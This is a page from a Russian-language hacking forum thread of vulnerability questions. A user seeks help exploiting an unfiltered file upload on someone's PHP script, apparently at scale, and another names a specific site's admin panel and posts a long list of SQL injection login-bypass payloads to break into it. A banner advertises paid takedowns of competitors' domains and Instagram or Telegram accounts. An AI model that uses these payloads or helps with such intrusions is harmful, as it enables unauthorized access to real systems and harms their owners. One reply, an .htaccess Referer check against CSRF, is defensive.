Ваши вопросы по уязвимостям.

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ

Скрыть

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Ваши вопросы по уязвимостям.

Страница 215 из 296

215

Опции темы

Поиск в этой теме

Опции просмотра

#2141

28.11.2017, 12:26

Gorev

Познавший АНТИЧАТ

Регистрация: 31.03.2006

Сообщений: 1,167

Провел на форуме:
4072944

Репутация: 1550

Отправить сообщение для Gorev с помощью Yahoo

Цитата:

Сообщение от MyNameIsWhoIsWho

↑
Ребят подскажите, нашел файл аплоад, но хз как отправить файл пост запросом)
Хтмл формы для заливки нет.
Как мне вообще создать запрос на отправку файла? И чем его отправить?
Знаю что тупой вопрос, но почему то всегда игнорировал эту тему а теперь пришлось столкнуться
Или ткните носом в инфу, полистал форум с гуглом, что-то не нашел

Плагином для лисы

#2142

28.11.2017, 12:31

MyNameIsWhoIsWho

Новичок

Регистрация: 07.06.2017

Сообщений: 4

Провел на форуме:
1219

Репутация: 0

Цитата:

Сообщение от BabaDook

↑
Вы уверены что файл рабочий, в крации вам нужен параметр, его можно прочитать, или угадать, ткните пальцем в небо и быть может вы попадёте в звезду зелёного цвета. Надеюсь я достаточно ясно объяснил на сколько это реально сделать

Ничего не понял.

Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы

#2143

28.11.2017, 14:12

MotherHacker

Новичок

Регистрация: 14.10.2017

Сообщений: 10

Провел на форуме:
2312

Репутация: 0

Цитата:

Сообщение от MyNameIsWhoIsWho

↑
Ничего не понял.
Есть пхп скрипт, где загрузка файла не фильтруется. Параметр для пост запроса я знаю, просто пост запрос знаю как отправлять, но не знаю как отправлять файл пост запросом скрипту без хтмл формы

Создаёшь файл на рабочем столе index.html

Открываешь файл и пишешь:

Код HTML:

Затем открываешь index.html в браузере

#2144

29.11.2017, 01:57

gena ryzhov

Новичок

Регистрация: 18.12.2013

Сообщений: 16

Провел на форуме:
4684

Репутация: 0

Цитата:

Сообщение от MotherHacker

↑
Создаёшь файл на рабочем столе index.html
Открываешь файл и пишешь:

Код HTML:

Затем открываешь index.html в браузере

http://htmlbook.ru/html/form/enctype

#2145

29.11.2017, 07:21

MyNameIsWhoIsWho

Новичок

Регистрация: 07.06.2017

Сообщений: 4

Провел на форуме:
1219

Репутация: 0

Цитата:

Сообщение от gena ryzhov

gena ryzhov said:
↑

http://htmlbook.ru/html/form/enctype

Я вкурсе, спасибо)

Мне надо это было под массы заточить и отследить сам запрос, а не по одному ручками сидеть отправлять)

Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.

http://clip2net.com/s/3PSUKqs

#2146

29.11.2017, 12:10

MotherHacker

Новичок

Регистрация: 14.10.2017

Сообщений: 10

Провел на форуме:
2312

Репутация: 0

Цитата:

Сообщение от MyNameIsWhoIsWho

↑
Другой вопрос. Вот это добро можно как то привести в человеческий вид? Чтоб код читабельный был.
http://clip2net.com/s/3PSUKqs

Всё можно

https://goo.gl/VneRw3

#2147

29.11.2017, 23:13

BabaDook

Познавший АНТИЧАТ

Регистрация: 09.05.2015

Сообщений: 1,066

Провел на форуме:
238786

Репутация: 40

Вась. Я тебя не понимаю, у тебя вопросы вообще адовые. Тебя так не помогут

#2148

02.12.2017, 17:44

Octavian

Постоянный

Регистрация: 08.07.2015

Сообщений: 501

Провел на форуме:
97114

Репутация: 24

Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?

#2149

02.12.2017, 20:06

Muracha

Участник форума

Регистрация: 30.07.2011

Сообщений: 151

Провел на форуме:
54593

Репутация: 0

Вот таой замечательный сайт

.SpoilerTarget" type="button">Spoiler: 1
cyber-cafe.ru/admin/
вбить admin: admin - и тебе скажет, что нет логина и пароля. Есть вбить комбинации в сплойлере - выходит ошибка синтакс еррор. Вопрос к знатокам: действительно ли не получится авторизоваться, или нужен другой вектор?

Или иногда ошибка бывает простой ошибкой без возможности авторизации?

.SpoilerTarget" type="button">Spoiler: 2
or 1=1

or 1=1--

or 1=1#

or 1=1/*

admin' --

admin' #

admin'/*

admin' or '1'='1

admin' or '1'='1'--

admin' or '1'='1'#

admin' or '1'='1'/*

admin'or 1=1 or ''='

admin' or 1=1

admin' or 1=1--

admin' or 1=1#

admin' or 1=1/*

admin') or ('1'='1

admin') or ('1'='1'--

admin') or ('1'='1'#

admin') or ('1'='1'/*

admin') or '1'='1

admin') or '1'='1'--

admin') or '1'='1'#

admin') or '1'='1'/*

1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055

admin" --

admin" #

admin"/*

admin" or "1"="1

admin" or "1"="1"--

admin" or "1"="1"#

admin" or "1"="1"/*

admin"or 1=1 or ""="

admin" or 1=1

admin" or 1=1--

admin" or 1=1#

admin" or 1=1/*

admin") or ("1"="1

admin") or ("1"="1"--

admin") or ("1"="1"#

admin") or ("1"="1"/*

admin") or "1"="1

admin") or "1"="1"--

admin") or "1"="1"#

admin") or "1"="1"/*

1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055

#2150

02.12.2017, 20:15

crlf

Постоянный

Регистрация: 18.03.2016

Сообщений: 663

Провел на форуме:
169212

Репутация: 441

Цитата:

Сообщение от Octavian

↑
Можно сделать проверку Referer через .htaccess дабы получить защиту от CSRF ?

Код:

RewriteEngine On
RewriteCond %{HTTP_REFERER} !^http(s)?://(www\.)?site.com/.*
RewriteRule .* - [F]

Страница 215 из 296

215

« Предыдущая тема | Следующая тема »

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход